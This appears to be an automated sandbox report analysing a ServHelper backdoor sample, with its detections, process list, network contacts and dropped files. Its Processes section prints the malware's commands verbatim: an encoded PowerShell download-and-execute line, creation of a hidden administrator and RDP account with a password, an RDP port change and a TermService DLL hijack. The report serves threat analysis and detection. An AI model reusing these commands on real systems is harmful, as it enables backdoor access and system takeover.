Malware Analysis Report

2024-10-19 04:37

Sample ID 210922-g4b5asedej
Target 61d5e32562d1c70daf0a3112f7888258.exe
SHA256 da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
Tags: servhelper backdoor discovery exploit persistence suricata trojan upx
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605

Threat Level: Known bad

The file 61d5e32562d1c70daf0a3112f7888258.exe was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence suricata trojan upx

suricata: ET MALWARE ServHelper CnC Inital Checkin

ServHelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

UPX packed file

Sets DLL path for service in the registry

Blocklisted process makes network request

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Suspicious behavior: LoadsDriver

Script User-Agent

Modifies registry key

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-22 06:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-22 06:21

Reported

2021-09-22 06:24

Platform

win7v20210408

Max time kernel

167s

Max time network

188s

Command Line

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

Signatures

ServHelper

trojan backdoor servhelper

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7fc69aa-b31d-4c73-9aee-74b52a70cad7 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_928e1545-d3f4-42aa-8697-b0076d1abc46 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_141a24d8-449e-4974-94ef-285a988282ab | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_229db460-2302-4054-b1b6-982bb0ef94ae | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9880927e-2494-4d24-a7f8-a6fcdff6762e | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_323d885c-4adc-4743-b9e2-dbff51c78107 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0d11be0-ee1c-4581-81e7-371b7150ce13 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ea27df9c-bc90-40c3-8e19-c43c1104e839 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b816317e-70d8-4475-8151-893cd53f43a2 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3LFTIR59G5681HH3G32.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8b05eb37-a2d3-4e6d-94e4-69a5b87b963f | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_74ba2926-1d90-4656-a223-c63556293bb4 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00945e0d8bafd701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1840 wrote to memory of 1224 | N/A | C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1840 wrote to memory of 1224 | N/A | C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1840 wrote to memory of 1224 | N/A | C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 268 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1224 wrote to memory of 268 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1224 wrote to memory of 268 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 268 wrote to memory of 760 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 268 wrote to memory of 760 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 268 wrote to memory of 760 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1224 wrote to memory of 1552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1716 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1716 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1716 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 1224 wrote to memory of 1756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 1224 wrote to memory of 1756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 1224 wrote to memory of 1696 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1696 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1696 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1368 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1368 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1368 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1492 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 1224 wrote to memory of 1492 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 1224 wrote to memory of 1492 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 1492 wrote to memory of 1844 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 1844 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 1844 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1224 wrote to memory of 1084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1224 wrote to memory of 1084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1224 wrote to memory of 1084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 1800 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 1800 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 1800 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1800 wrote to memory of 1632 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81DB.tmp" "c:\Users\Admin\AppData\Local\Temp\01ximcta\CSC1CD5A0B993214D799C33BD3EA94FE8DB.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc lfOn4usP /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc lfOn4usP /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc lfOn4usP /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc lfOn4usP

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc lfOn4usP

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc lfOn4usP

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | raw.githubusercontent.com | udp
US | 185.199.108.133:443 | raw.githubusercontent.com | tcp
US | 8.8.8.8:53 | zuvujvhuaif.xyz | udp
MD | 185.163.45.186:443 | zuvujvhuaif.xyz | tcp

Files

memory/1840-60-0x0000000041740000-0x0000000041B3F000-memory.dmp

memory/1840-63-0x00000000412C4000-0x00000000412C6000-memory.dmp

memory/1840-62-0x00000000412C2000-0x00000000412C4000-memory.dmp

memory/1840-64-0x00000000412C6000-0x00000000412C7000-memory.dmp

memory/1840-65-0x00000000412C7000-0x00000000412C8000-memory.dmp

memory/1224-66-0x0000000000000000-mapping.dmp

memory/1224-67-0x000007FEFB9F1000-0x000007FEFB9F3000-memory.dmp

memory/1224-68-0x0000000001F00000-0x0000000001F01000-memory.dmp

memory/1224-69-0x000000001ADE0000-0x000000001ADE1000-memory.dmp

memory/1224-70-0x000000001AC60000-0x000000001AC62000-memory.dmp

memory/1224-71-0x000000001AC64000-0x000000001AC66000-memory.dmp

memory/1224-72-0x0000000001F60000-0x0000000001F61000-memory.dmp

memory/1224-73-0x0000000002030000-0x0000000002031000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
